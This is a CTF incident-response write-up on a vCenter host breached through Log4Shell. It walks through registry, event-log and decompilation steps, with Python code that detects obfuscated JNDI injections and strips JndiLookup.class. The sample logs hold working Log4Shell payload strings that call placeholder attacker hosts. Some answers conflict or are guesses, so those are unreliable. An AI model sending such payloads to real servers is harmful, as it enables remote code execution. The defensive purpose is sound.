CyberDefenders.org hosted a fun 48-hour CTF (the extended window gave more players time to take part), all about responding to an incident where a box had been attacked, compromised using the recent log4j (Log4Shell, CVE-2021-44228) exploit, and subsequently had malware and ransomware installed. You are provided with a forensic image and have to answer a series of forensic and IR questions.
For those that don't know about CyberDefenders, they host a platform dedicated to training blue-team skills (incident response, digital forensics, security analysis, etc.). If you are used to VulnHub and Hack The Box, those services are typically geared more towards red-teaming and penetration testing. This is where CyberDefenders stands out!
1 What is the computer hostname?
2 What is the Timezone of the compromised machine?
- SYSTEM hive: ControlSet00X\Control\TimeZoneInformation (pick the control set from SYSTEM\Select\Current; CurrentControlSet only exists on a live system) - PST
3 What is the current build number on the system?
- export explorer.exe (C:\Windows\explorer.exe) from the image with FTK Imager
- right-click > Properties > Details tab; the file version carries the build number (the SOFTWARE hive, Microsoft\Windows NT\CurrentVersion\CurrentBuild, gives the same answer)
4 What is the computer IP?
5 What is the domain computer was assigned to?
6 When was myoussef user created?
- Security event log, event ID 4720 (a user account was created)
- or scrape the creation time from the SAM hive: it is the last-write timestamp of the key SAM\Domains\Account\Users\Names\myoussef
- from the SAM registry: 61006e00 = 2021-07-27 20:35:12 UTC
- 2021-12-28 06:57:23 UTC
7 What is the user mhasan password hint?
- SAM hive: the UserPasswordHint value under the user's RID key (SAM\Domains\Account\Users\<RID>)
8 What is the version of the VMware product installed on the machine?
- SOFTWARE hive: the product's DisplayVersion under Microsoft\Windows\CurrentVersion\Uninstall
9 What is the version of the log4j library used by the installed VMware product?
10 What is the log4j library log level specified in the configuration file?
11 The attacker exploited log4shell through an HTTP login request. What is the HTTP header used to inject payload?
Not sure about this one; surely the header is X-Forwarded-For.
12 The attacker used the log4shell.huntress.com payload to detect if vcenter instance is vulnerable. What is the first link of the log4huntress payload?
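Detection logic for the payload pattern behind Q11 and Q12, as an added example (not code from the challenge or from the original notes). The log lines are constructed, with placeholder hosts and lookup IDs, and use a simplified "request + header" format; real vCenter logs need only the HEADER regex adjusted. The point it adds beyond the notes is the obfuscation attackers used to slip past naive `${jndi:` matching (`${lower:j}`, `${::-j}`), which the scanner collapses before matching:

```python
import re

# Constructed sample log lines (not from the challenge image): request line plus the
# header the payload arrived in. Hosts and lookup IDs are placeholders.
LOGS = """\
2021-12-28T20:35:01Z 10.0.0.5 POST /websso/SAML2/SSO/vsphere.local "X-Forwarded-For: ${jndi:ldap://log4shell.huntress.com/abc123}"
2021-12-28T20:35:07Z 10.0.0.5 POST /websso/SAML2/SSO/vsphere.local "X-Forwarded-For: ${${lower:j}ndi:${lower:l}dap://203.0.113.7:1389/a}"
2021-12-28T20:35:09Z 10.0.0.5 POST /websso/SAML2/SSO/vsphere.local "User-Agent: ${${::-j}${::-n}${::-d}${::-i}:rmi://203.0.113.7:1099/x}"
2021-12-28T20:36:00Z 10.0.0.9 GET /ui/ "User-Agent: Mozilla/5.0"
"""

# Innermost ${...} lookup: no nested braces or '$' inside.
INNER = re.compile(r"\$\{([^${}]*)\}")
# A JNDI lookup after de-obfuscation: scheme, host, optional port.
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*(\w+)://([^/}:\s]+)(?::(\d+))?", re.I)
# Header name and value in the constructed format above.
HEADER = re.compile(r'"([A-Za-z0-9-]+):\s*(.*)"\s*$')

def resolve(expr):
    """Evaluate one obfuscation primitive: default-value (${x:-y} -> y) and case lookups."""
    if ":-" in expr:
        return expr.split(":-", 1)[1]
    m = re.match(r"(lower|upper):(.*)$", expr, re.I)
    if m:
        return m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper()
    return None                       # not an obfuscation wrapper, leave it alone

def deobfuscate(s, max_rounds=20):
    """Repeatedly collapse innermost obfuscation lookups until the string stops changing."""
    for _ in range(max_rounds):
        changed = False

        def sub(m):
            nonlocal changed
            r = resolve(m.group(1))
            if r is None:
                return m.group(0)
            changed = True
            return r

        s = INNER.sub(sub, s)
        if not changed:
            break
    return s

def scan(log_text):
    """Return one hit per log line whose header value contains a JNDI lookup."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        h = HEADER.search(line)
        if not h:
            continue
        header, value = h.group(1), deobfuscate(h.group(2))
        m = JNDI.search(value)
        if m:
            hits.append({"line": n, "header": header, "scheme": m.group(1).lower(),
                         "host": m.group(2), "port": int(m.group(3)) if m.group(3) else None})
    return hits

if __name__ == "__main__":
    for hit in scan(LOGS):
        print(hit)
```

The `host` field is what answers Q12 (the callback host in the first lookup) and the `header` field answers Q11; grep for `${jndi:` alone would have missed lines 2 and 3.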
13 When was the first successful login to vsphere WebClient?
- 28/12/2021 20:39:29 UTC
14 What is the attacker’s IP address?
- PowerShell event logs: the reverse-shell payload embeds the callback address
15 What is the port the attacker used to receive the cobalt strike reverse shell?
- PowerShell event logs (script block logging, event ID 4104)
- the Administrator's PSReadLine history (ConsoleHost_history.txt)
- Mandiant's speakeasy to emulate the decoded shellcode and recover the C2 host and port
16 What is the script name published by VMware to mitigate log4shell vulnerability?
17 In some cases, you may not be able to update the products used in your network. What is the system property needed to set to 'true' to work around the log4shell vulnerability?
- a JVM system property (log4j2.formatMsgNoLookups=true, or the LOG4J_FORMAT_MSG_NO_LOOKUPS environment variable); it only exists in log4j 2.10 and later and was subsequently found to be an incomplete mitigation (CVE-2021-45046), so treat it as a stopgap, not a fix
18 What is the log4j version which contains a patch to CVE-2021-44228?
- Google-fu: Apache's Log4j security page lists the fixed versions (2.15.0 for CVE-2021-44228, with 2.16.0 and 2.17.0 following for CVE-2021-45046 and CVE-2021-45105)
19 Removing JndiLookup.class from log4j-core (org/apache/logging/log4j/core/lookup/JndiLookup.class) may help in mitigating log4shell. What is the sha256 hash of JndiLookup.class?
20 Analyze JndiLookup.class. What is the value stored in the CONTAINER_JNDI_RESOURCE_PATH_PREFIX variable?
- decompile the class with JAD (or another Java decompiler)
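An added example for Q19 (not from the challenge or the original notes): locate every copy of JndiLookup.class, hash it, and produce a copy of the archive with the class removed. It recurses into nested jars because vendor products often ship log4j-core inside another jar or war, which a plain `unzip -l` on the top-level archive misses. The jar it operates on is constructed in the script with placeholder bytes in place of real bytecode, so the printed hash is illustrative; on the image, point `find_class` at the product's real jar bytes:

```python
import hashlib
import io
import zipfile

# Apache's documented removal path; the class lives in log4j-core.
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
NESTED = (".jar", ".war", ".ear", ".zip")

# Constructed placeholder "bytecode" for the demo jar; a real hash comes from the real class file.
SAMPLE_JNDI_BYTES = b"\xca\xfe\xba\xbe placeholder JndiLookup"

def sha256_hex(data):
    return hashlib.sha256(data).hexdigest()

def find_class(archive, target=JNDI_CLASS, prefix=""):
    """Return [(path, sha256)] for every copy of target, descending into nested archives."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        for name in zf.namelist():
            data = zf.read(name)
            if name == target:
                hits.append((prefix + name, sha256_hex(data)))
            elif name.lower().endswith(NESTED):
                try:
                    hits.extend(find_class(data, target, prefix + name + "!/"))
                except zipfile.BadZipFile:
                    pass          # named like an archive but is not one; skip it
    return hits

def strip_class(archive, target=JNDI_CLASS):
    """Rewrite the archive without target, recursing into nested archives: the equivalent
    of Apache's `zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class`."""
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(archive)) as src, \
         zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as dst:
        for info in src.infolist():
            if info.filename == target:
                continue
            data = src.read(info.filename)
            if info.filename.lower().endswith(NESTED):
                try:
                    data = strip_class(data, target)
                except zipfile.BadZipFile:
                    pass
            dst.writestr(info.filename, data)
    return out.getvalue()

def list_entries(archive, prefix=""):
    """Flat list of every entry, nested archives expanded with a '!/' separator."""
    names = []
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        for name in zf.namelist():
            names.append(prefix + name)
            if name.lower().endswith(NESTED):
                try:
                    names.extend(list_entries(zf.read(name), prefix + name + "!/"))
                except zipfile.BadZipFile:
                    pass
    return names

def build_sample():
    """Constructed stand-in for a vendor deployment: a fake log4j-core nested in an app jar."""
    def jar(entries):
        buf = io.BytesIO()
        with zipfile.ZipFile(buf, "w") as z:
            for n, d in entries.items():
                z.writestr(n, d)
        return buf.getvalue()
    core = jar({"META-INF/MANIFEST.MF": b"Manifest-Version: 1.0\n",
                JNDI_CLASS: SAMPLE_JNDI_BYTES,
                "org/apache/logging/log4j/core/lookup/StrLookup.class": b"\xca\xfe\xba\xbe other"})
    return jar({"lib/log4j-core.jar": core, "app/Main.class": b"\xca\xfe\xba\xbe main"})

if __name__ == "__main__":
    sample = build_sample()
    for path, digest in find_class(sample):
        print(path, digest)
    print("after strip:", find_class(strip_class(sample)))
```

Hashing the class before removing it is worth the extra step: the digest tells you which log4j build you had, and it is the evidence that the exact file Apache's advisory names was the one taken out.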
21 To gain some persistence the attacker dropped a malicious exe file. What is the malicious executable name?
- Run keys (Software\Microsoft\Windows\CurrentVersion\Run)
- in the user's NTUSER.DAT hive
22 When was the first submission of ransomware to virustotal?
23 The ransomware downloads a text file from an external server. What is the key used to decrypt the URL?
- use ILSpy to decompile the .NET ransomware
24 What is the ISP that owns that IP that serves the text file?
- whois 126.96.36.199
25 The ransomware check for extensions to exclude them from the encryption process. What is the second extension the ransomware checks for?
- use ILSpy
- 67 1d 2f 2e ^ ItAGEocK (the stored bytes are XORed with the key)
Tools used
- FTK Imager
- Mandiant's Speakeasy
- JAD (Java Decompiler)